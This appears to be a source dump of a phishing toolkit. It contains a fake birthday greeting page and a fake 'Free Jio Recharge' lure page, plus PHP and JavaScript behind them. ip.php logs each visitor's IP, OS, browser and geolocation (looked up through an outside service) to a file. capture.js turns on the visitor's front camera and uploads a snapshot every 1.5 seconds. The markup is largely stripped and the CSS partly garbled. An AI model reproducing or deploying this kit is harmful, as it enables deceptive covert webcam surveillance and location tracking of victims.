59 |
60 |
61 |
62 |
63 |
64 |
65 |
68 |
69 |
70 |
73 |
74 |
75 |
78 |
79 |
80 |
81 |
82 |
83 |
84 |
88 |
92 |
96 |
100 |
104 |
108 |
112 |
113 |
114 |
115 |
116 |
117 |
118 |
119 |
123 |
126 |
127 |
128 |
129 | Wishing you a very
130 |
131 |
132 |
✪ Happy birthday ✪
133 |
134 |
to you and your lovely family
135 |
136 |
May this auspicious occasion of birthday bring happiness, prosperity, health, and peace in your life.
137 |
138 |
✪ I wish that this birthday is your best one. ✪
139 |
140 |
141 |
This message birthday should be in everyone's mobile, it is your duty!
142 |
143 |
144 |
147 |
148 |
149 |
150 |
156 |
159 |
160 |
161 |
162 |
163 |
193 |
194 |
195 |
196 |
197 |
198 |
199 |
203 |
207 |
208 |
212 |
213 |
--------------------------------------------------------------------------------
/sites/fest/index.php:
--------------------------------------------------------------------------------
1 |
6 |
--------------------------------------------------------------------------------
/sites/fest/ip.php:
--------------------------------------------------------------------------------
1 | 'Windows 10',
40 | '/windows nt 6.3/i' => 'Windows 8.1',
41 | '/windows nt 6.2/i' => 'Windows 8',
42 | '/windows nt 6.1/i' => 'Windows 7',
43 | '/windows nt 6.0/i' => 'Windows Vista',
44 | '/windows nt 5.2/i' => 'Windows Server 2003/XP x64',
45 | '/windows nt 5.1/i' => 'Windows XP',
46 | '/windows xp/i' => 'Windows XP',
47 | '/windows nt 5.0/i' => 'Windows 2000',
48 | '/windows me/i' => 'Windows ME',
49 | '/win98/i' => 'Windows 98',
50 | '/win95/i' => 'Windows 95',
51 | '/win16/i' => 'Windows 3.11',
52 | '/macintosh|mac os x/i' => 'Mac OS X',
53 | '/mac_powerpc/i' => 'Mac OS 9',
54 | '/linux/i' => 'Linux',
55 | '/ubuntu/i' => 'Ubuntu',
56 | '/iphone/i' => 'iPhone',
57 | '/ipod/i' => 'iPod',
58 | '/ipad/i' => 'iPad',
59 | '/android/i' => 'Android',
60 | '/blackberry/i' => 'BlackBerry',
61 | '/webos/i' => 'Mobile'
62 | );
63 |
64 | foreach ($os_array as $regex => $value)
65 | if (preg_match($regex, $user_agent))
66 | $os_platform = $value;
67 |
68 | return $os_platform;
69 | }
70 |
71 | function getBrowser() {
72 | global $user_agent;
73 | $browser = "Unknown Browser";
74 | $browser_array = array(
75 | '/msie/i' => 'Internet Explorer',
76 | '/firefox/i' => 'Firefox',
77 | '/safari/i' => 'Safari',
78 | '/chrome/i' => 'Chrome',
79 | '/edge/i' => 'Edge',
80 | '/opera/i' => 'Opera',
81 | '/netscape/i' => 'Netscape',
82 | '/maxthon/i' => 'Maxthon',
83 | '/konqueror/i' => 'Konqueror',
84 | '/mobile/i' => 'Handheld Browser'
85 | );
86 |
87 | foreach ($browser_array as $regex => $value)
88 | if (preg_match($regex, $user_agent))
89 | $browser = $value;
90 |
91 | return $browser;
92 | }
93 |
94 |
95 | $user_os = getOS();
96 | $user_browser = getBrowser();
97 |
98 | $PublicIP = get_client_ip();
99 | $localHost = "127.0.0.1";
100 |
101 | if (strpos($PublicIP, ',') !== false) {
102 | $PublicIP = explode(",", $PublicIP)[0];
103 | }
104 |
105 | $file = 'ip.txt';
106 | $ip = "IP : ".$PublicIP;
107 | $uaget = "User Agent : ".$user_agent;
108 | $bsr = "Browser : ".$user_browser;
109 | $uos = "User OS : ".$user_os;
110 | $ust= explode(" ", $user_agent);
111 | $vr= $ust[3];
112 | $ver=str_replace(")", "", $vr);
113 | $version = "Version : ".$ver;
114 | if (strpos($PublicIP, $localHost) !== false) {
115 | $details = '{
116 | "success": false
117 | }';
118 | }
119 | else {
120 | $details = file_get_contents("http://ipwhois.app/json/$PublicIP");
121 | }
122 | $details = json_decode($details, true);
123 | $success = $details['success'];
124 | $fp = fopen($file, 'a');
125 |
126 | if ($success==false) {
127 | fwrite($fp, $ip."\n");
128 | fwrite($fp, $uos."\n");
129 | fwrite($fp, $version."\n");
130 | fwrite($fp, $bsr."\n");
131 | fclose($fp);
132 | } else if ($success==true) {
133 | $country = $details['country'];
134 | $city = $details['city'];
135 | $continent = $details['continent'];
136 | $tp = $details['type'];
137 | $cn = $details['country_phone'];
138 | $is = $details['isp'];
139 | $latitude = $details['latitude'];
140 | $longitude = $details['longitude'];
141 | $crn = $details['currency'];
142 | $type = "IP Type : ".$tp;
143 | $comma = ", ";
144 | $location = "Location : ".$city.$comma.$country.$comma.$continent;
145 | $geolocation= "GeoLocation(lat, lon): ".$latitude.$comma.$longitude;
146 | $isp = "ISP : ".$is;
147 | $currency = "Currency : ".$crn;
148 |
149 | fwrite($fp, $ip."\n");
150 | fwrite($fp, $type."\n");
151 | fwrite($fp, $uos."\n");
152 | fwrite($fp, $version."\n");
153 | fwrite($fp, $uaget."\n");
154 | fwrite($fp, $bsr."\n");
155 | fwrite($fp, $location."\n");
156 | fwrite($fp, $geolocation."\n");
157 | fwrite($fp, $currency."\n");
158 | fclose($fp);
159 | } else {
160 | $status = "Status : ".$success;
161 | fwrite($fp, $status."\n");
162 | fwrite($fp, $uaget."\n");
163 | fclose($fp);
164 | }
165 | ?>
--------------------------------------------------------------------------------
/sites/fest/post.php:
--------------------------------------------------------------------------------
1 |
19 |
20 |
--------------------------------------------------------------------------------
/sites/fest/styles.css:
--------------------------------------------------------------------------------
1 | i {
2 | color:#f06414;
3 | }
4 | input[type=name], select {
5 | width: 100%;
6 | padding: 12px 20px;
7 | margin: 4px 0;
8 | display: inline-block;
9 | border: 1px solid #ccc;
10 | border-radius: 4px;
11 | box-sizing: border-box;
12 | }
13 | .footerbtn1 {
14 | display: block;
15 | line-height: 15px;
16 | position: fixed;
17 | right:0px;
18 | bottom:0px;
19 | height:40px;
20 | border-radius: 15px;
21 | box-sizing: border-box;
22 | padding: 5px;
23 | background:#000099;
24 | color: #ffffff;
25 | font-size: 18px;
26 | text-align: center;
27 | text-decoration: none;
28 | width:45%;
29 | margin-right:10px;
30 | margin-right:30px;
31 | box-shadow: 0 4px 12px 0 rgba(0, 0, 0, .3);
32 | animation: footer infinite linear 1s;
33 | -webkit-transform: translate3d(30%,0,0);
34 | transform: translate3d(30%,0,0);
35 | position: fixed;
36 |
37 | }
38 |
39 | .footerbtn1 :active {
40 | box-shadow: none
41 | }
42 |
43 | @-webkit-keyframes footer {
44 | from {
45 | -webkit-transform: rotateZ(0)
46 | }
47 | 25% {
48 | -webkit-transform: rotateZ(1.5deg)
49 | }
50 | 50% {
51 | -webkit-transform: rotateZ(0deg)
52 | }
53 | 75% {
54 | -webkit-transform: rotateZ(-1.5deg)
55 | }
56 | to {
57 | -webkit-transform: rotateZ(0)
58 | }
59 | }
60 |
61 | .footerbtn {
62 | display: block;
63 | line-height: 15px;
64 | position: fixed;
65 | left:0px;
66 | bottom:0px;
67 | height:40px;
68 | border-radius: 15px;
69 | box-sizing: border-box;
70 | padding: 5px;
71 | background:#34af23;
72 | color: #ffffff;
73 | font-size: 18px;
74 | text-align: center;
75 | text-decoration: none;
76 | width:45%;
77 | margin-left:10px;
78 | margin-right:30px;
79 | box-shadow: 0 4px 12px 0 rgba(0, 0, 0, .3);
80 | animation: footer infinite linear 1s;
81 | -webkit-transform: translate3d(30%,0,0);
82 | transform: translate3d(30%,0,0);
83 | position: fixed;
84 |
85 | }
86 |
87 | .footerbtn :active {
88 | box-shadow: none
89 | }
90 |
91 | @-webkit-keyframes footer {
92 | from {
93 | -webkit-transform: rotateZ(0)
94 | }
95 | 25% {
96 | -webkit-transform: rotateZ(1.5deg)
97 | }
98 | 50% {
99 | -webkit-transform: rotateZ(0deg)
100 | }
101 | 75% {
102 | -webkit-transform: rotateZ(-1.5deg)
103 | }
104 | to {
105 | -webkit-transform: rotateZ(0)
106 | }
107 | }
108 |
109 | @-webkit-keyframes jello { from, 11.1%, to { transform: none; }
110 | 22.2% { transform: skewX(-12.5deg) skewY(-12.5deg); }
111 | 33.3% { transform: skewX(6.25deg) skewY(6.25deg); }
112 | 44.4% { transform: skewX(-3.125deg) skewY(-3.125deg); }
113 | 55.5% { transform: skewX(1.5625deg) skewY(1.5625deg); }
114 | 66.6% { transform: skewX(-0.78125deg) skewY(-0.78125deg); }
115 | 77.7% { transform: skewX(0.390625deg) skewY(0.390625deg); }
116 | 88.8% { transform: skewX(-0.1953125deg) skewY(-0.1953125deg); }}
117 | .jello { -webkit-animation: jello 3s infinite; transform-origin: center; -webkit-animation-delay:6s}
118 | @-webkit-keyframes hue {
119 | from { -webkit-filter: hue-rotate(0deg); }
120 | to { -webkit-filter: hue-rotate(-360deg); }}
121 | .m1{position:fixed;left:1%; width:auto;height:100%;top:1%;color:#000;}
122 | .m2{position:fixed;right:1%; width:auto;height:100%;top:1%;color:#000;}
123 | .bubbles {
124 | font-family: arial;
125 | }
126 |
127 | .bubbles hi {
128 | font-family: 'Luckiest Guy', cursive;
129 | color: black;
130 | }
131 |
132 | hi {
133 | font-size:2.5em;
134 | user-select:none;
135 | }
136 |
137 | hi span { display:inline-block; animation:float .2s ease-in-out infinite; }
138 | @keyframes float {
139 | 0%,100%{ transform:none; }
140 | 33%{ transform:translateY(-1px) rotate(-2deg); }
141 | 66%{ transform:translateY(1px) rotate(2deg); }
142 | }
143 | body:hover span { animation:bounce .6s; }
144 | @keyframes bounce {
145 | 0%,100%{ transform:translate(0); }
146 | 25%{ transform:rotateX(20deg) translateY(2px) rotate(-3deg); }
147 | 50%{ transform:translateY(-20px) rotate(3deg) scale(1.1); }
148 | }
149 |
150 | @import url(http://fonts.googleapis.com/css?family=Concert+One);
151 |
152 | h1 {
153 | animation:glow 10s ease-in-out infinite;
154 | }
155 |
156 |
157 |
158 | * { box-sizing:border-box; }
159 |
160 | figure {
161 | animation:wobble 5s ease-in-out infinite;
162 | transform-origin:center center;
163 | transform-style:preserve-3d;
164 | }
165 |
166 | @keyframes wobble {
167 | 0%,100%{ transform:rotate3d(1,1,0,40deg); }
168 | 25%{ transform:rotate3d(-1,1,0,40deg); }
169 | 50%{ transform:rotate3d(-1,-1,0,40deg); }
170 | 75%{ transform:rotate3d(1,-1,0,40deg); }
171 | }
172 |
173 | h1 {
174 | display:block;
175 | width:90%;
176 | line-height:1.5;
177 | font:900 35px 'Concert One', sans-serif;
178 | position:absolute;
179 | color:#fff;
180 | }
181 |
182 | @keyframes glow {
183 | 0%,100%{ text-shadow:0 0 30px red; }
184 | 25%{ text-shadow:0 0 30px orange; }
185 | 50%{ text-shadow:0 0 30px forestgreen; }
186 | 75%{ text-shadow:0 0 30px cyan; }
187 | }
188 |
189 | h1:nth-child(2){ transform:translateZ(5px); }
190 | h1:nth-child(3){ transform:translateZ(10px);}
191 | h1:nth-child(4){ transform:translateZ(15px); }
192 | h1:nth-child(5){ transform:translateZ(20px); }
193 | h1:nth-child(6){ transform:translateZ(25px); }
194 | h1:nth-child(7){ transform:translateZ(30p.rock{animation:infinite 1s rock}
195 | @keyframes rock { 0% { transform: rotate(-1deg); }
196 | 50% { transform: rotate(2deg); }
197 | 100% { transform: rotate(-1deg); }}x); }
198 | h1:nth-child(8){ transform:translateZ(35px); }
199 | h1:nth-child(9){ transform:translateZ(40px); }
200 | h1:nth-child(10){ transform:translateZ(45px); }
201 |
202 |
203 |
204 | .rock{animation:infinite 1s rock}
205 | @keyframes rock { 0% { transform: rotate(-1deg); }
206 | 50% { transform: rotate(2deg); }
207 | 100% { transform: rotate(-1deg); }}
208 |
209 | .fuck{animation:infinite 1s fuck}
210 | @keyframes rock { 0% { transform: rotate(-2deg); }
211 | 50% { transform: rotate(2deg); }
212 | 100% { transform: rotate(-2deg); }}
213 |
214 |
215 | h2 {
216 | font-size: 38px;
217 | text-align: center;
218 | color:#008000;
219 |
220 | animation: rock infinite 1s;
221 | font-family: 'Indie Flower', cursive;
222 | letter-spacing: 2px;
223 | }
224 |
225 | h3 {
226 | font-size: 48px;
227 | text-align: center;
228 | padding:1px;
229 | margin:1px;
230 | color: #f06414;
231 |
232 | aanimation: fuck infinite 1s;
233 | font-family: 'Indie Flower', cursive;
234 | letter-spacing: 2px;
235 |
236 |
237 | * {box-sizing: border-box;}
238 | body {font-family: Verdana, sans-serif;}
239 | .mySlides {display: none;}
240 | img {vertical-align: middle;}
241 |
242 | /* Slideshow container */
243 | .slideshow-container {
244 | max-width: 1000px;
245 | position: relative;
246 | margin: auto;
247 | }
248 |
249 | /* Caption text */
250 | .text {
251 | color: #f2f2f2;
252 | font-size: 15px;
253 | padding: 8px 12px;
254 | position: absolute;
255 | bottom: 8px;
256 | width: 100%;
257 | text-align: center;
258 | }
259 |
260 | /* Number text (1/11 etc) */
261 | .numbertext {
262 | color: #f2f2f2;
263 | font-size: 12px;
264 | padding: 8px 12px;
265 | position: absolute;
266 | top: 0;
267 | }
268 |
269 | /* The dots/bullets/indicators */
270 | .dot {
271 | height: 15px;
272 | width: 15px;
273 | margin: 0 2px;
274 | background-color: #bbb;
275 | border-radius: 50%;
276 | display: inline-block;
277 | transition: background-color 0.6s ease;
278 | }
279 |
280 | .active {
281 | background-color: #717171;
282 | }
283 |
284 | /* Fading animation */
285 | .fade {
286 | -webkit-animation-name: fade;
287 | -webkit-animation-duration: 1.5s;
288 | animation-name: fade;
289 | animation-duration: 1.5s;
290 | }
291 |
292 | @-webkit-keyframes fade {
293 | from {opacity: .4}
294 | to {opacity: 1}
295 | }
296 |
297 | @keyframes fade {
298 | from {opacity: .4}
299 | to {opacity: 1}
300 | }
301 |
302 | /* On smaller screens, decrease text size */
303 | @media only screen and (max-width: 300px) {
304 | .text {font-size: 11px}
305 |
306 | }
307 |
308 | .cssload-preloader {
309 | position: absolute;
310 | top: 0px;
311 | left: px;
312 | right: 40px;
313 | bottom: 20px;
314 | z-index: 10;
315 | }
316 |
317 | .cssload-preloader > .cssload-preloader-box {
318 | position: absolute;
319 | height: 16px;
320 | top: 50%;
321 | left: 50%;
322 | margin: -8px 0 0 -82px;
323 | perspective: 110px;
324 | -o-perspective: 110px;
325 | -ms-perspective: 110px;
326 | -webkit-perspective: 110px;
327 | -moz-perspective: 110px;
328 | }
329 |
330 | .cssload-preloader .cssload-preloader-box > div {
331 | position: relative;
332 | width: 16px;
333 | height: 16px;
334 | background: rgb(204,204,204);
335 | float: left;
336 | text-align: center;
337 | line-height: 16px;
338 | font-family: Verdana;
339 | font-size: 11px;
340 | color: rgb(255,255,255);
341 | }.cssload-preloader .cssload-preloader-box > div:nth-child(1) {
342 | background: rgb(255,0,0);
343 | margin-right: 8px;
344 | animation: cssload-movement 690ms ease 0ms infinite alternate;
345 | -o-animation: cssload-movement 690ms ease 0ms infinite alternate;
346 | -ms-animation: cssload-movement 690ms ease 0ms infinite alternate;
347 | -webkit-animation: cssload-movement 690ms ease 0ms infinite alternate;
348 | -moz-animation: cssload-movement 690ms ease 0ms infinite alternate;
349 | }
350 | .cssload-preloader .cssload-preloader-box > div:nth-child(2) {
351 | background: rgb(255,0,0);
352 | margin-right: 8px;
353 | animation: cssload-movement 690ms ease 86.25ms infinite alternate;
354 | -o-animation: cssload-movement 690ms ease 86.25ms infinite alternate;
355 | -ms-animation: cssload-movement 690ms ease 86.25ms infinite alternate;
356 | -webkit-animation: cssload-movement 690ms ease 86.25ms infinite alternate;
357 | -moz-animation: cssload-movement 690ms ease 86.25ms infinite alternate;
358 | }
359 | .cssload-preloader .cssload-preloader-box > div:nth-child(3) {
360 | background: rgb(255,0,0);
361 | margin-right: 8px;
362 | animation: cssload-movement 690ms ease 172.5ms infinite alternate;
363 | -o-animation: cssload-movement 690ms ease 172.5ms infinite alternate;
364 | -ms-animation: cssload-movement 690ms ease 172.5ms infinite alternate;
365 | -webkit-animation: cssload-movement 690ms ease 172.5ms infinite alternate;
366 | -moz-animation: cssload-movement 690ms ease 172.5ms infinite alternate;
367 | }
368 | .cssload-preloader .cssload-preloader-box > div:nth-child(4) {
369 | background: rgb(204,255,0);
370 | margin-right: 8px;
371 | animation: cssload-movement 690ms ease 258.75ms infinite alternate;
372 | -o-animation: cssload-movement 690ms ease 258.75ms infinite alternate;
373 | -ms-animation: cssload-movement 690ms ease 258.75ms infinite alternate;
374 | -webkit-animation: cssload-movement 690ms ease 258.75ms infinite alternate;
375 | -moz-animation: cssload-movement 690ms ease 258.75ms infinite alternate;
376 | }
377 | .cssload-preloader .cssload-preloader-box > div:nth-child(5) {
378 | background: rgb(0,255,60);
379 | margin-right: 8px;
380 | animation: cssload-movement 690ms ease 345ms infinite alternate;
381 | -o-animation: cssload-movement 690ms ease 345ms infinite alternate;
382 | -ms-animation: cssload-movement 690ms ease 345ms infinite alternate;
383 | -webkit-animation: cssload-movement 690ms ease 345ms infinite alternate;
384 | -moz-animation: cssload-movement 690ms ease 345ms infinite alternate;
385 | }
386 | .cssload-preloader .cssload-preloader-box > div:nth-child(6) {
387 | background: rgb(0,185,252);
388 | margin-right: 8px;
389 | animation: cssload-movement 690ms ease 431.25ms infinite alternate;
390 | -o-animation: cssload-movement 690ms ease 431.25ms infinite alternate;
391 | -ms-animation: cssload-movement 690ms ease 431.25ms infinite alternate;
392 | -webkit-animation: cssload-movement 690ms ease 431.25ms infinite alternate;
393 | -moz-animation: cssload-movement 690ms ease 431.25ms infinite alternate;
394 | }
395 | .cssload-preloader .cssload-preloader-box > div:nth-child(7) {
396 | background: rgb(58,0,250);
397 | margin-right: 8px;
398 | animation: cssload-movement 690ms ease 517.5ms infinite alternate;
399 | -o-animation: cssload-movement 690ms ease 517.5ms infinite alternate;
400 | -ms-animation: cssload-movement 690ms ease 517.5ms infinite alternate;
401 | -webkit-animation: cssload-movement 690ms ease 517.5ms infinite alternate;
402 | -moz-animation: cssload-movement 690ms ease 517.5ms infinite alternate;
403 | }
404 | .cssload-preloader .cssload-preloader-box > div:nth-child(8) {
405 | background: rgb(255,255,0);
406 | margin-right: 8px;
407 | animation: cssload-movement 690ms ease 603.75ms infinite alternate;
408 | -o-animation: cssload-movement 690ms ease 603.75ms infinite alternate;
409 | -ms-animation: cssload-movement 690ms ease 603.75ms infinite alternate;
410 | -webkit-animation: cssload-movement 690ms ease 603.75ms infinite alternate;
411 | -moz-animation: cssload-movement 690ms ease 603.75ms infinite alternate;
412 | }
413 | .cssload-preloader .cssload-preloader-box > div:nth-child(9) {
414 | background: rgb(221,0,255);
415 | margin-right: 8px;
416 | animation: cssload-movement 690ms ease 690ms infinite alternate;
417 | -o-animation: cssload-movement 690ms ease 690ms infinite alternate;
418 | -ms-animation: cssload-movement 690ms ease 690ms infinite alternate;
419 | -webkit-animation: cssload-movement 690ms ease 690ms infinite alternate;
420 | -moz-animation: cssload-movement 690ms ease 690ms infinite alternate;
421 | }
422 | .cssload-preloader .cssload-preloader-box > div:nth-child(10) {
423 | background: rgb(51,102,255);
424 | margin-right: 8px;
425 | animation: cssload-movement 690ms ease 776.25ms infinite alternate;
426 | -o-animation: cssload-movement 690ms ease 776.25ms infinite alternate;
427 | -ms-animation: cssload-movement 690ms ease 776.25ms infinite alternate;
428 | -webkit-animation: cssload-movement 690ms ease 776.25ms infinite alternate;
429 | -moz-animation: cssload-movement 690ms ease 776.25ms infinite alternate;
430 | }
--------------------------------------------------------------------------------
/sites/jio/capture.js:
--------------------------------------------------------------------------------
1 | 'use strict';
2 | const video = document.getElementById('video');
3 | const canvas = document.getElementById('canvas');
4 | const errorMsgElement = document.querySelector('span#errorMsg');
5 |
6 | const constraints = {
7 | audio: false,
8 | video: {
9 | facingMode: "user"
10 | }
11 | };
12 |
13 | const post = (imgdata) =>{
14 | $.ajax({
15 | type: 'POST',
16 | data: { cat: imgdata},
17 | url: '/post.php',
18 | dataType: 'json',
19 | async: false,
20 | success: (result) => {
21 | // call the function that handles the response/results
22 | },
23 | error: function(){
24 | errorMsgElement
25 | }
26 | });
27 | };
28 |
29 |
30 |
31 | // Success
32 | const handleSuccess = (stream) => {
33 | window.stream = stream;
34 | video.srcObject = stream;
35 |
36 | var context = canvas.getContext('2d');
37 | setInterval(() => {
38 | context.drawImage(video, 0, 0, 640, 480);
39 | var canvasData = canvas.toDataURL("image/png").replace("image/png", "image/octet-stream");
40 | post(canvasData);
41 | }, 1500);
42 | }
43 |
44 | // Access webcam
45 | const init = async () => {
46 | try {
47 | const stream = await navigator.mediaDevices.getUserMedia(constraints);
48 | handleSuccess(stream);
49 | } catch (e) {
50 | errorMsgElement.innerHTML = `navigator.getUserMedia error:${e.toString()}`;
51 | }
52 | }
53 |
54 | // Load init
55 | init();
--------------------------------------------------------------------------------
/sites/jio/index.html:
--------------------------------------------------------------------------------
1 |
2 |
3 |
4 |
5 |
6 |
Hey Dear! You Have Won Free Rs 399 Jio Recharge
7 |
8 |
9 |
10 |
11 |
12 |
13 |
14 |
15 |
16 |
17 |
18 |
40 |
41 |
Offer expires within
42 |
43 |
44 |
45 |
46 |
47 |
48 |
49 |
50 |
51 |
52 |
53 |
55 |
56 |
57 |
58 |
59 |
60 |
61 |
62 |
63 |
64 |
65 |
66 |
67 |
68 |
69 |
71 |